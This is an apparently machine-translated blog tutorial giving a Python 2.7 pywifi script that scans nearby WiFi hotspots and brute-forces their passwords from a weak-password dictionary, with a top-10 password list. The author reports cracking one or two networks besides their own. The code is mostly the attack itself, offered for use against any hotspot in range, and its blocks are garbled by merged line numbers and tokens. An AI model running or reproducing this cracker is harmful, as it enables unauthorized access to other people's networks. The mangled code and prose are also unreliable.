Absrtact: I have to explain that this thing is not high-end, even look a bit bad. And with a single-threaded ~, because a few days to move, so.
Environment Preparation
- python2.7
- Passable Linux
- Almost the wireless card
- Pywifi Module
- Weak password dictionary
- Clears any WiFi connection record in the system (very important!!!)
First of all, this module in win a little chicken, the author in the call Wlanapi did not do a good wlan_security_attributes package, so recommended to run under Linux, I test the use of Kali 2.0 comes with Python 2.7.6, can directly through Pip Install Pywifi installation.
Import Module
The module used here is in the _send_cmd_to_wpas method of this three Pywifi _wifiutil_linux.py script if reply! = B ' ok\n ': Judging needs to be modified, otherwise there will be a lot of hints.
from Import *import timeimport sys
Dictionary Preparation
Efficiency is very important, after all, this thing is really slow to run, the following is the more than the use of the WiFi weak password TOP10
- 12345678
- 123456789
- 88888888
- 1234567890
- 00000000
- 87654321
- 66668888
- 11223344
- 147258369
- 11111111
Configuring the Scanner
Recommended scan can often be set in 15-20 seconds between testing often can be customized, taking into account the certification speed in the relationship between the distance, I generally set in about 15, and then a long time, even if the success of the hot spot, the signal is not where
1 defMain ():2 #scanning often3Scantimes = 34 #Single password test delay5Testtimes = 156Output =Sys.stdout7 #result File Save path8Files ="TestRes.txt"9 #List of dictionariesTenKeys = open (Sys.argv[1],"R"). ReadLines () One Print "| KEYS%s"%(len (keys)) A #instantiate a Pywifi object -WiFi =Pywifi () - #Select a network card and assign it to Iface theIface =wifi.interfaces () [0] - #perform a frequent scantimes scan with Iface and get a nearby hotspot base configuration -Scanres =Scans (Iface,scantimes) - #statistics the number of hotspots found nearby +Nums =Len (scanres) - Print "| SCAN GET%s"%(nums) + Print "%s\n%-*s|%-*s|%-*s|%-*s |%-*s |%-*s%*s \n%s"%("-"*70,6,"wifiid", 18,"SSID OR BSSID", 2,"N", 4," Time", 7,"Signal", 10,"Keynum", 10,"KEY","="*70) A #test each hotspot information individually at forI,xinchEnumerate (scanres): - #Once the test is complete, the successful results are stored in files -res = Test (nums-i,iface,x,keys,output,testtimes) - ifRes: -Open (Files,"a"). Write (RES)
scan around Hotspots
1 def Scans (face,timeout): 2 # Start Scanning 3 Face.scan ()4 time.sleep (timeout)5 # Get scan results after a few seconds 6 return face.scan_results ()
Hot Test
The follow-up recommendation is to keep the scanning process data in place, preventing duplicate scans and making it more intuitive.
1 defTest (i,face,x,key,stu,ts):2 #display the corresponding network name, taking into account some Chinese name tut display Bssid3Showid = X.bssidifLen (x.ssid) >len (X.BSSID)ElseX.ssid4 #iterate the dictionary and explode5 forN,kinchEnumerate (key):6X.key =K.strip ()7 #Remove all hotspot configurations8 face.remove_all_network_profiles ()9 #tell the packaged target to try to connectTen Face.connect (Face.add_network_profile (x)) One #initializes the status code, taking into account that some logic errors occur with 0 ACode = 10 -T1 =time.time () - #Loop Refresh State, if set to 0 password error, such as timeout to the next the whilecode!=0: -Time.sleep (0.1) -Code =face.status () -now = Time.time ()-T1 + ifNow>TS: - Break +Stu.write ("\r%-*s|%-*s|%s |%*.2fs|%-*s | %-*s%*s"% (6,i,18,showid,code,5,now,7,x.signal,10,len (key)-n,10,k.replace ("\ n",""))) A Stu.flush () at ifCode = = 4: - Face.disconnect () - return "%-*s|%s |%*s |%*s\n"% (20,x.ssid,x.bssid,3,x.signal,15, K) - returnFalse
Case
This shows that the test used 11 weak password, and scanned to 20 hot spots, and then began to pit daddy's run up
- wifiid hotspot ID number will be reduced by 1 per run.
- SSID or BSSID hotspot's SSID name or MAC address
- N The connection state of the hotspot, this
- time that is currently spent
- signal The signal strength of the hotspot, if the smaller the better
- The ID of the keynum test password will be reduced by 1 per run.
- Key the current test password
The result is not bad, everyone's safety awareness is not as painful as before, sweep out one or two, one of them is his own--
Python Learning Exchange Group: 125240963
Reprint to: https://my.oschina.net/Apathy/blog/821039
A very easy to understand WiFi password blasting python script